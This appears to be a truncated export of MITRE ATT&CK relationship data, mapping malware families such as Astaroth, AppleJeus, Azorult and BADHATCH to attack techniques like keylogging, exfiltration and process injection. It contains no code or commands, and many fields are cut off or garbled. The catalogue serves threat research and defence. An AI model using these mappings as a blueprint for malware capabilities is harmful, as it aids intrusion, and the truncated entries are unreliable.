S1025 Amadey malware-- software uses T1016 System Netattack-pat technique [Amadey](ht
S1025 Amadey malware-- software uses T1033 System Own attack-pat technique [Amadey](h
S1025 Amadey malware-- software uses T1071.001Web Protocattack-pat technique [Amadey](h
S0504 Anchor malware-- software uses T1553.002Code Signi attack-pat technique [Anchor](ht
S0504 Anchor malware-- software uses T1053.003Cron attack-pat technique [Anchor](ht
S0504 Anchor malware-- software uses T1071.004DNS attack-pat technique Variants o
S0504 Anchor malware-- software uses T1480 Execution attack-pat technique [Anchor](ht
S0504 Anchor malware-- software uses T1008 Fallback C attack-pat technique [Anchor](ht
S0504 Anchor malware-- software uses T1070.004File Deleti attack-pat technique [Anchor](ht
S0504 Anchor malware-- software uses T1105 Ingress Tooattack-pat technique [Anchor](h
S0504 Anchor malware-- software uses T1564.004NTFS File Aattack-pat technique [Anchor](h
S0504 Anchor malware-- software uses T1095 Non-Applicattack-pat technique [Anchor](h
S0504 Anchor malware-- software uses T1027 Obfuscatedattack-pat technique [Anchor](h
S0504 Anchor malware-- software uses T1021.002SMB/Windo attack-pat technique [Anchor](h
S0504 Anchor malware-- software uses T1053.005Scheduled attack-pat technique [Anchor](h
S0504 Anchor malware-- software uses T1569.002Service Ex attack-pat technique [Anchor](h
S0504 Anchor malware-- software uses T1027.002Software Pattack-pat technique [Anchor](h
S0504 Anchor malware-- software uses T1082 System Inf attack-pat technique [Anchor](h
S0504 Anchor malware-- software uses T1016 System Netattack-pat technique [Anchor](h
S0504 Anchor malware-- software uses T1059.004Unix Shell attack-pat technique [Anchor](ht
S0504 Anchor malware-- software uses T1071.001Web Protocattack-pat technique [Anchor](h
S0504 Anchor malware-- software uses T1059.003Windows Cattack-pat technique [Anchor](ht
S0504 Anchor malware-- software uses T1543.003Windows Se attack-pat technique [Anchor](ht
S1133 Apostle malware-- software uses T1070.001Clear Windattack-pat technique [Apostle](h
S1133 Apostle malware-- software uses T1485 Data Destrattack-pat technique [Apostle](h
S1133 Apostle malware-- software uses T1486 Data Encryattack-pat technique [Apostle](h
S1133 Apostle malware-- software uses T1140 Deobfuscatattack-pat technique [Apostle](h
S1133 Apostle malware-- software uses T1561.001Disk Conteattack-pat technique [Apostle](h
S1133 Apostle malware-- software uses T1480 Execution attack-pat technique [Apostle](h
S1133 Apostle malware-- software uses T1070.004File Deleti attack-pat technique [Apostle](h
S1133 Apostle malware-- software uses T1057 Process Di attack-pat technique [Apostle](h
S1133 Apostle malware-- software uses T1053.005Scheduled attack-pat technique [Apostle](
S1133 Apostle malware-- software uses T1529 System Sh attack-pat technique [Apostle](h
S0584 AppleJeus malware--esoftware uses T1548.002Bypass Useattack-pat technique [AppleJeus]
S0584 AppleJeus malware--esoftware uses T1553.002Code Signi attack-pat technique [AppleJeus]
S0584 AppleJeus malware--esoftware uses T1140 Deobfuscatattack-pat technique [AppleJeus]
S0584 AppleJeus malware--esoftware uses T1041 Exfiltratio attack-pat technique [AppleJeus]
S0584 AppleJeus malware--esoftware uses T1070.004File Deleti attack-pat technique [AppleJeus]
S0584 AppleJeus malware--esoftware uses T1564.001Hidden Fileattack-pat technique [AppleJeus]
S0584 AppleJeus malware--esoftware uses T1546.016Installer P attack-pat technique During [App
S0584 AppleJeus malware--esoftware uses T1543.004Launch Da attack-pat technique [AppleJeus]
S0584 AppleJeus malware--esoftware uses T1569.001Launchctl attack-pat technique [AppleJeus]
S0584 AppleJeus malware--esoftware uses T1204.002Malicious Fattack-pat technique [AppleJeus]
S0584 AppleJeus malware--esoftware uses T1204.001Malicious Lattack-pat technique [AppleJeus]
S0584 AppleJeus malware--esoftware uses T1218.007Msiexec attack-pat technique [AppleJeus]
S0584 AppleJeus malware--esoftware uses T1027 Obfuscatedattack-pat technique [AppleJeus]
S0584 AppleJeus malware--esoftware uses T1053.005Scheduled attack-pat technique [AppleJeus]
S0584 AppleJeus malware--esoftware uses T1566.002Spearphishattack-pat technique [AppleJeus]
S0584 AppleJeus malware--esoftware uses T1082 System Inf attack-pat technique [AppleJeus]
S0584 AppleJeus malware--esoftware uses T1497.003Time Basedattack-pat technique [AppleJeus]
S0584 AppleJeus malware--esoftware uses T1059.004Unix Shell attack-pat technique [AppleJeus]
S0584 AppleJeus malware--esoftware uses T1071.001Web Protocattack-pat technique [AppleJeus]
S0584 AppleJeus malware--esoftware uses T1543.003Windows Se attack-pat technique [AppleJeus]
S0622 AppleSeedmalware-- software uses T1134 Access Tokattack-pat technique [AppleSeed
S0622 AppleSeedmalware-- software uses T1560 Archive Coattack-pat technique [AppleSeed]
S0622 AppleSeedmalware-- software uses T1560.001Archive viaattack-pat technique [AppleSeed]
S0622 AppleSeedmalware-- software uses T1119 Automatedattack-pat technique [AppleSeed]
S0622 AppleSeedmalware-- software uses T1030 Data Transfattack-pat technique [AppleSeed]
S0622 AppleSeedmalware-- software uses T1005 Data from attack-pat technique [AppleSeed
S0622 AppleSeedmalware-- software uses T1025 Data from attack-pat technique [AppleSeed
S0622 AppleSeedmalware-- software uses T1140 Deobfuscatattack-pat technique [AppleSeed
S0622 AppleSeedmalware-- software uses T1041 Exfiltratio attack-pat technique [AppleSeed]
S0622 AppleSeedmalware-- software uses T1567 Exfiltratio attack-pat technique [AppleSeed]
S0622 AppleSeedmalware-- software uses T1008 Fallback C attack-pat technique [AppleSeed
S0622 AppleSeedmalware-- software uses T1070.004File Deleti attack-pat technique [AppleSeed]
S0622 AppleSeedmalware-- software uses T1083 File and Di attack-pat technique [AppleSeed]
S0622 AppleSeedmalware-- software uses T1059.007JavaScript attack-pat technique [AppleSeed]
S0622 AppleSeedmalware-- software uses T1056.001Keyloggingattack-pat technique [AppleSeed
S0622 AppleSeedmalware-- software uses T1074.001Local Data attack-pat technique [AppleSeed]
S0622 AppleSeedmalware-- software uses T1204.002Malicious Fattack-pat technique [AppleSeed]
S0622 AppleSeedmalware-- software uses T1036 Masqueradattack-pat technique [AppleSeed]
S0622 AppleSeedmalware-- software uses T1036.005Match Legiattack-pat technique [AppleSeed
S0622 AppleSeedmalware-- software uses T1106 Native API attack-pat technique [AppleSeed]
S0622 AppleSeedmalware-- software uses T1027 Obfuscatedattack-pat technique [AppleSeed]
S0622 AppleSeedmalware-- software uses T1059.001PowerShellattack-pat technique [AppleSeed]
S0622 AppleSeedmalware-- software uses T1057 Process Di attack-pat technique [AppleSeed
S0622 AppleSeedmalware-- software uses T1547.001Registry Ruattack-pat technique [AppleSeed
S0622 AppleSeedmalware-- software uses T1218.010Regsvr32 attack-pat technique [AppleSeed]
S0622 AppleSeedmalware-- software uses T1113 Screen Capattack-pat technique [AppleSeed]
S0622 AppleSeedmalware-- software uses T1027.002Software Pattack-pat technique [AppleSeed
S0622 AppleSeedmalware-- software uses T1566.001Spearphishattack-pat technique [AppleSeed
S0622 AppleSeedmalware-- software uses T1082 System Inf attack-pat technique [AppleSeed]
S0622 AppleSeedmalware-- software uses T1016 System Netattack-pat technique [AppleSeed]
S0622 AppleSeedmalware-- software uses T1124 System Timattack-pat technique [AppleSeed
S0622 AppleSeedmalware-- software uses T1071.001Web Protocattack-pat technique [AppleSeed
S0456 Aria-body malware-- software uses T1010 Applicatio attack-pat technique [Aria-body]
S0456 Aria-body malware-- software uses T1560 Archive Coattack-pat technique [Aria-body
S0456 Aria-body malware-- software uses T1134.002Create Proattack-pat technique [Aria-body]
S0456 Aria-body malware-- software uses T1025 Data from attack-pat technique [Aria-body]
S0456 Aria-body malware-- software uses T1140 Deobfuscatattack-pat technique [Aria-body]
S0456 Aria-body malware-- software uses T1568.002Domain Gen attack-pat technique [Aria-body]
S0456 Aria-body malware-- software uses T1055.001Dynamic-linattack-pat technique [Aria-body]
S0456 Aria-body malware-- software uses T1027.013Encrypted/attack-pat technique [Aria-body]
S0456 Aria-body malware-- software uses T1070.004File Deleti attack-pat technique [Aria-body]
S0456 Aria-body malware-- software uses T1083 File and Di attack-pat technique [Aria-body]
S0456 Aria-body malware-- software uses T1105 Ingress Tooattack-pat technique [Aria-body]
S0456 Aria-body malware-- software uses T1106 Native API attack-pat technique [Aria-body]
S0456 Aria-body malware-- software uses T1095 Non-Applicattack-pat technique [Aria-body
S0456 Aria-body malware-- software uses T1057 Process Di attack-pat technique [Aria-body]
S0456 Aria-body malware-- software uses T1090 Proxy attack-pat technique [Aria-body]
S0456 Aria-body malware-- software uses T1547.001Registry Ruattack-pat technique [Aria-body]
S0456 Aria-body malware-- software uses T1113 Screen Capattack-pat technique [Aria-body]
S0456 Aria-body malware-- software uses T1082 System Inf attack-pat technique [Aria-body
S0456 Aria-body malware-- software uses T1016 System Netattack-pat technique [Aria-body]
S0456 Aria-body malware-- software uses T1049 System Netattack-pat technique [Aria-body]
S0456 Aria-body malware-- software uses T1033 System Own attack-pat technique [Aria-body]
S0456 Aria-body malware-- software uses T1134.001Token Impeattack-pat technique [Aria-body]
S0456 Aria-body malware-- software uses T1071.001Web Protocattack-pat technique [Aria-body
S0099 Arp tool--3048 software uses T1018 Remote Sysattack-pat technique [Arp](https
S0099 Arp tool--3048 software uses T1016 System Netattack-pat technique [Arp](https
S0373 Astaroth malware-- software uses T1115 Clipboard attack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1027.010Command aOttack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1218.001Compiled Hattack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1555 Credential attack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1574.001DLL Searchattack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1102.001Dead Dropattack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1140 Deobfuscatattack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1568.002Domain Gen attack-pat technique [Astaroth]
S0373 Astaroth malware-- software uses T1027.013Encrypted/attack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1041 Exfiltratio attack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1564.003Hidden Wi attack-pat technique [Astaroth]
S0373 Astaroth malware-- software uses T1105 Ingress Tooattack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1059.007JavaScript attack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1056.001Keyloggingattack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1074.001Local Data attack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1204.002Malicious Fattack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1564.004NTFS File Aattack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1057 Process Di attack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1055.012Process Hoattack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1547.001Registry Ruattack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1218.010Regsvr32 attack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1518.001Security S attack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1129 Shared Moattack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1547.009Shortcut Mattack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1027.002Software Pattack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1566.001Spearphishattack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1132.001Standard Eattack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1497.001System Cheattack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1082 System Inf attack-pat technique [Astaroth]
S0373 Astaroth malware-- software uses T1016 System Netattack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1124 System Timattack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1552 Unsecuredattack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1059.005Visual Basiattack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1059.003Windows Cattack-pat technique [Astaroth]
S0373 Astaroth malware-- software uses T1047 Windows M attack-pat technique [Astaroth](
S0373 Astaroth malware-- software uses T1220 XSL Script attack-pat technique [Astaroth](
S1087 AsyncRAT tool--6a59 software uses T1622 Debugger Eattack-pat technique [AsyncRAT]
S1087 AsyncRAT tool--6a59 software uses T1568 Dynamic Reattack-pat technique [AsyncRAT]
S1087 AsyncRAT tool--6a59 software uses T1564.003Hidden Wi attack-pat technique [AsyncRAT](https://attack.mi
S1087 AsyncRAT tool--6a59 software uses T1105 Ingress Tooattack-pat technique [AsyncRAT](
S1087 AsyncRAT tool--6a59 software uses T1056.001Keyloggingattack-pat technique [AsyncRAT]
S1087 AsyncRAT tool--6a59 software uses T1106 Native API attack-pat technique [AsyncRAT]
S1087 AsyncRAT tool--6a59 software uses T1057 Process Di attack-pat technique [AsyncRAT]
S1087 AsyncRAT tool--6a59 software uses T1053.005Scheduled attack-pat technique [AsyncRAT](
S1087 AsyncRAT tool--6a59 software uses T1113 Screen Capattack-pat technique [AsyncRAT](
S1087 AsyncRAT tool--6a59 software uses T1497.001System Cheattack-pat technique [AsyncRAT](
S1087 AsyncRAT tool--6a59 software uses T1082 System Inf attack-pat technique [AsyncRAT](
S1087 AsyncRAT tool--6a59 software uses T1033 System Own attack-pat technique [AsyncRAT](
S1087 AsyncRAT tool--6a59 software uses T1125 Video Captattack-pat technique [AsyncRAT]
S0438 Attor malware-- software uses T1010 Applicatio attack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1560.003Archive vi attack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1573.002Asymmetricattack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1055.004Asynchronoattack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1123 Audio Captattack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1119 Automatedattack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1020 Automatedattack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1115 Clipboard attack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1027.013Encrypted/attack-pat technique Strings in
S0438 Attor malware-- software uses T1041 Exfiltratio attack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1070.004File Deleti attack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1071.002File Transf attack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1083 File and Di attack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1564.001Hidden Fileattack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1105 Ingress Tooattack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1056.001Keyloggingattack-pat technique One of [Att
S0438 Attor malware-- software uses T1074.001Local Data attack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1037.001Logon Scri attack-pat technique [Attor](ht
S0438 Attor malware-- software uses T1036.004Masquerade attack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1112 Modify Regattack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1090.003Multi-hop attack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1106 Native API attack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1120 Peripheral attack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1055 Process Injattack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1012 Query Regiattack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1218.011Rundll32 attack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1053.005Scheduled attack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1113 Screen Capattack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1569.002Service Ex attack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1129 Shared Moattack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1573.001Symmetric attack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1497.001System Cheattack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1082 System Inf attack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1070.006Timestompattack-pat technique [Attor](htt
S0438 Attor malware-- software uses T1543.003Windows Se attack-pat technique [Attor](htt
S1029 AuTo Stealmalware-- software uses T1005 Data from attack-pat technique [AuTo Steal
S1029 AuTo Stealmalware-- software uses T1041 Exfiltratio attack-pat technique [AuTo Steal
S1029 AuTo Stealmalware-- software uses T1074.001Local Data attack-pat technique [AuTo Steal
S1029 AuTo Stealmalware-- software uses T1095 Non-Applicattack-pat technique [AuTo Stea
S1029 AuTo Stealmalware-- software uses T1547.001Registry Ruattack-pat technique [AuTo Steal
S1029 AuTo Stealmalware-- software uses T1518.001Security S attack-pat technique [AuTo Steal
S1029 AuTo Stealmalware-- software uses T1082 System Inf attack-pat technique [AuTo Steal
S1029 AuTo Stealmalware-- software uses T1033 System Own attack-pat technique [AuTo Steal
S1029 AuTo Stealmalware-- software uses T1071.001Web Protocattack-pat technique [AuTo Stea
S1029 AuTo Stealmalware-- software uses T1059.003Windows Cattack-pat technique [AuTo Stea
S0347 AuditCred malware-- software uses T1140 Deobfuscatattack-pat technique [AuditCred
S0347 AuditCred malware-- software uses T1027.013Encrypted/attack-pat technique [AuditCred]
S0347 AuditCred malware-- software uses T1070.004File Deleti attack-pat technique [AuditCred]
S0347 AuditCred malware-- software uses T1083 File and Di attack-pat technique [AuditCred]
S0347 AuditCred malware-- software uses T1105 Ingress Tooattack-pat technique [AuditCred
S0347 AuditCred malware-- software uses T1055 Process Injattack-pat technique [AuditCred]
S0347 AuditCred malware-- software uses T1090 Proxy attack-pat technique [AuditCred]
S0347 AuditCred malware-- software uses T1059.003Windows Cattack-pat technique [AuditCred
S0347 AuditCred malware-- software uses T1543.003Windows Se attack-pat technique [AuditCred]
S0129 AutoIt bac malware--fsoftware uses T1548.002Bypass Useattack-pat technique [AutoIt bac
S0129 AutoIt bac malware--fsoftware uses T1083 File and Di attack-pat technique [AutoIt bac
S0129 AutoIt bac malware--fsoftware uses T1059.001PowerShellattack-pat technique [AutoIt bac
S0129 AutoIt bac malware--fsoftware uses T1132.001Standard Eattack-pat technique [AutoIt ba
S0640 Avaddon malware-- software uses T1548.002Bypass Useattack-pat technique [Avaddon](
S0640 Avaddon malware-- software uses T1486 Data Encryattack-pat technique [Avaddon](
S0640 Avaddon malware-- software uses T1140 Deobfuscatattack-pat technique [Avaddon](
S0640 Avaddon malware-- software uses T1562.001Disable or attack-pat technique [Avaddon](h
S0640 Avaddon malware-- software uses T1083 File and Di attack-pat technique [Avaddon](h
S0640 Avaddon malware-- software uses T1490 Inhibit Sy attack-pat technique [Avaddon](
S0640 Avaddon malware-- software uses T1059.007JavaScript attack-pat technique [Avaddon](
S0640 Avaddon malware-- software uses T1112 Modify Regattack-pat technique [Avaddon](h
S0640 Avaddon malware-- software uses T1106 Native API attack-pat technique [Avaddon](
S0640 Avaddon malware-- software uses T1135 Network Shattack-pat technique [Avaddon](
S0640 Avaddon malware-- software uses T1027 Obfuscatedattack-pat technique [Avaddon](h
S0640 Avaddon malware-- software uses T1057 Process Di attack-pat technique [Avaddon](
S0640 Avaddon malware-- software uses T1547.001Registry Ruattack-pat technique [Avaddon](h
S0640 Avaddon malware-- software uses T1489 Service Stoattack-pat technique [Avaddon](h
S0640 Avaddon malware-- software uses T1614.001System Lanattack-pat technique [Avaddon](h
S0640 Avaddon malware-- software uses T1016 System Netattack-pat technique [Avaddon](h
S0640 Avaddon malware-- software uses T1047 Windows M attack-pat technique [Avaddon](
S0473 Avenger malware-- software uses T1140 Deobfuscatattack-pat technique [Avenger](h
S0473 Avenger malware-- software uses T1027.013Encrypted/attack-pat technique [Avenger](h
S0473 Avenger malware-- software uses T1083 File and Di attack-pat technique [Avenger](h
S0473 Avenger malware-- software uses T1105 Ingress Tooattack-pat technique [Avenger](h
S0473 Avenger malware-- software uses T1057 Process Di attack-pat technique [Avenger](h
S0473 Avenger malware-- software uses T1055 Process Injattack-pat technique [Avenger](h
S0473 Avenger malware-- software uses T1518.001Security S attack-pat technique [Avenger](h
S0473 Avenger malware-- software uses T1027.003Steganogr attack-pat technique [Avenger](
S0473 Avenger malware-- software uses T1082 System Inf attack-pat technique [Avenger](h
S0473 Avenger malware-- software uses T1016 System Netattack-pat technique [Avenger](
S0473 Avenger malware-- software uses T1071.001Web Protocattack-pat technique [Avenger](h
S1053 AvosLockermalware-- software uses T1486 Data Encryattack-pat technique [AvosLocker
S1053 AvosLockermalware-- software uses T1140 Deobfuscatattack-pat technique [AvosLocke
S1053 AvosLockermalware-- software uses T1027.007Dynamic APattack-pat technique [AvosLocker
S1053 AvosLockermalware-- software uses T1083 File and Di attack-pat technique [AvosLocker
S1053 AvosLockermalware-- software uses T1564.003Hidden Wi attack-pat technique [AvosLocke
S1053 AvosLockermalware-- software uses T1036.008Masquerade attack-pat technique [AvosLocker
S1053 AvosLockermalware-- software uses T1106 Native API attack-pat technique [AvosLocker
S1053 AvosLockermalware-- software uses T1135 Network Shattack-pat technique [AvosLocke
S1053 AvosLockermalware-- software uses T1027 Obfuscatedattack-pat technique [AvosLocke
S1053 AvosLockermalware-- software uses T1057 Process Di attack-pat technique [AvosLocker
S1053 AvosLockermalware-- software uses T1547.001Registry Ruattack-pat technique [AvosLocker
S1053 AvosLockermalware-- software uses T1562.009Safe Modeattack-pat technique [AvosLocke
S1053 AvosLockermalware-- software uses T1489 Service Stoattack-pat technique [AvosLocker
S1053 AvosLockermalware-- software uses T1529 System Sh attack-pat technique [AvosLocker
S1053 AvosLockermalware-- software uses T1124 System Timattack-pat technique [AvosLocke
S0344 Azorult malware-- software uses T1134.002Create Proattack-pat technique [Azorult](h
S0344 Azorult malware-- software uses T1552.001Credentialsattack-pat technique [Azorult](h
S0344 Azorult malware-- software uses T1555.003Credential attack-pat technique [Azorult](h
S0344 Azorult malware-- software uses T1140 Deobfuscatattack-pat technique [Azorult](h
S0344 Azorult malware-- software uses T1070.004File Deleti attack-pat technique [Azorult](h
S0344 Azorult malware-- software uses T1083 File and Di attack-pat technique [Azorult](h
S0344 Azorult malware-- software uses T1105 Ingress Tooattack-pat technique [Azorult](h
S0344 Azorult malware-- software uses T1057 Process Di attack-pat technique [Azorult](h
S0344 Azorult malware-- software uses T1055.012Process Hoattack-pat technique [Azorult](h
S0344 Azorult malware-- software uses T1012 Query Regiattack-pat technique [Azorult](
S0344 Azorult malware-- software uses T1113 Screen Capattack-pat technique [Azorult](h
S0344 Azorult malware-- software uses T1573.001Symmetric attack-pat technique [Azorult](h
S0344 Azorult malware-- software uses T1082 System Inf attack-pat technique [Azorult](h
S0344 Azorult malware-- software uses T1016 System Netattack-pat technique [Azorult](h
S0344 Azorult malware-- software uses T1033 System Own attack-pat technique [Azorult](h
S0344 Azorult malware-- software uses T1124 System Timattack-pat technique [Azorult](h
S0031 BACKSPAC malware-- software uses T1562.004Disable or attack-pat technique The "ZR" va
S0031 BACKSPAC malware-- software uses T1041 Exfiltratio attack-pat technique Adversaries
S0031 BACKSPAC malware-- software uses T1083 File and Di attack-pat technique [BACKSPACE]
S0031 BACKSPAC malware-- software uses T1090.001Internal Prattack-pat technique The "ZJ" va
S0031 BACKSPAC malware-- software uses T1112 Modify Regattack-pat technique [BACKSPACE]
S0031 BACKSPAC malware-- software uses T1104 Multi-Stag attack-pat technique [BACKSPACE]
S0031 BACKSPAC malware-- software uses T1132.002Non-Standaattack-pat technique Newer vari
S0031 BACKSPAC malware-- software uses T1057 Process Di attack-pat technique [BACKSPACE
S0031 BACKSPAC malware-- software uses T1012 Query Regiattack-pat technique [BACKSPACE]
S0031 BACKSPAC malware-- software uses T1547.001Registry Ruattack-pat technique [BACKSPACE]
S0031 BACKSPAC malware-- software uses T1547.009Shortcut Mattack-pat technique [BACKSPACE]
S0031 BACKSPAC malware-- software uses T1082 System Inf attack-pat technique During its
S0031 BACKSPAC malware-- software uses T1071.001Web Protocattack-pat technique [BACKSPACE
S0031 BACKSPAC malware-- software uses T1059.003Windows Cattack-pat technique Adversaries
S0245 BADCALL malware-- software uses T1562.004Disable or attack-pat technique [BADCALL](h
S0245 BADCALL malware-- software uses T1112 Modify Regattack-pat technique [BADCALL](
S0245 BADCALL malware-- software uses T1571 Non-Standaattack-pat technique [BADCALL](
S0245 BADCALL malware-- software uses T1001.003Protocol o attack-pat technique [BADCALL](
S0245 BADCALL malware-- software uses T1090 Proxy attack-pat technique [BADCALL](
S0245 BADCALL malware-- software uses T1573.001Symmetric attack-pat technique [BADCALL](
S0245 BADCALL malware-- software uses T1082 System Inf attack-pat technique [BADCALL](
S0245 BADCALL malware-- software uses T1016 System Netattack-pat technique [BADCALL](
S0642 BADFLICK malware-- software uses T1560.002Archive viaattack-pat technique [BADFLICK]
S0642 BADFLICK malware-- software uses T1005 Data from attack-pat technique [BADFLICK]
S0642 BADFLICK malware-- software uses T1140 Deobfuscatattack-pat technique [BADFLICK]
S0642 BADFLICK malware-- software uses T1083 File and Di attack-pat technique [BADFLICK]
S0642 BADFLICK malware-- software uses T1105 Ingress Tooattack-pat technique [BADFLICK]
S0642 BADFLICK malware-- software uses T1204.002Malicious Fattack-pat technique [BADFLICK]
S0642 BADFLICK malware-- software uses T1566.001Spearphishattack-pat technique [BADFLICK]
S0642 BADFLICK malware-- software uses T1082 System Inf attack-pat technique [BADFLICK]
S0642 BADFLICK malware-- software uses T1016 System Netattack-pat technique [BADFLICK]
S0642 BADFLICK malware-- software uses T1497.003Time Basedattack-pat technique [BADFLICK]
S1081 BADHATCHmalware-- software uses T1573.002Asymmetricattack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1055.004Asynchronoattack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1548.002Bypass Useattack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1027.010Command aOttack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1069.002Domain Grattack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1482 Domain Truattack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1055.001Dynamic-linattack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1027.009Embeddedattack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1027.013Encrypted/attack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1041 Exfiltratio attack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1070.004File Deleti attack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1071.002File Transf attack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1105 Ingress Tooattack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1106 Native API attack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1046 Network Seattack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1135 Network Shattack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1550.002Pass the H attack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1059.001PowerShellattack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1057 Process Di attack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1055 Process Injattack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1090 Proxy attack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1620 Reflective attack-pat technique [BADHATCH](
S1081 BADHATCHmalware-- software uses T1018 Remote Sysattack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1053.005Scheduled attack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1113 Screen Capattack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1082 System Inf attack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1049 System Netattack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1033 System Own attack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1124 System Timattack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1134.001Token Impeattack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1071.001Web Protocattack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1102 Web Servicattack-pat technique [BADHATCH](
S1081 BADHATCHmalware-- software uses T1059.003Windows Cattack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1047 Windows M attack-pat technique [BADHATCH]
S1081 BADHATCHmalware-- software uses T1546.003Windows Ma attack-pat technique [BADHATCH]
S0128 BADNEWS malware-- software uses T1119 Automatedattack-pat technique [BADNEWS](
S0128 BADNEWS malware-- software uses T1102.002Bidirectio attack-pat technique [BADNEWS](
S0128 BADNEWS malware-- software uses T1574.002DLL Side-L attack-pat technique [BADNEWS](h
S0128 BADNEWS malware-- software uses T1132 Data Encodattack-pat technique After encry
S0128 BADNEWS malware-- software uses T1005 Data from attack-pat technique When it fir
S0128 BADNEWS malware-- software uses T1039 Data from attack-pat technique When it fir
[BADNEWS](https://attack.m
S0128 BADNEWS malware-- software uses T1025 Data from attack-pat technique a predefined directory.(Citati
S0128 BADNEWS malware-- software uses T1102.001Dead Dropattack-pat technique [BADNEWS](
S0128 BADNEWS malware-- software uses T1083 File and Di attack-pat technique [BADNEWS](h
S0128 BADNEWS malware-- software uses T1105 Ingress Tooattack-pat technique [BADNEWS](h
S0128 BADNEWS malware-- software uses T1036.001Invalid Codattack-pat technique [BADNEWS](h
S0128 BADNEWS malware-- software uses T1056.001Keyloggingattack-pat technique When it fi
S0128 BADNEWS malware-- software uses T1074.001Local Data attack-pat technique [BADNEWS](
S0128 BADNEWS malware-- software uses T1036.005Match Legiattack-pat technique [BADNEWS](h
S0128 BADNEWS malware-- software uses T1106 Native API attack-pat technique [BADNEWS](
S0128 BADNEWS malware-- software uses T1120 Peripheral attack-pat technique [BADNEWS](
S0128 BADNEWS malware-- software uses T1055.012Process Hoattack-pat technique [BADNEWS](
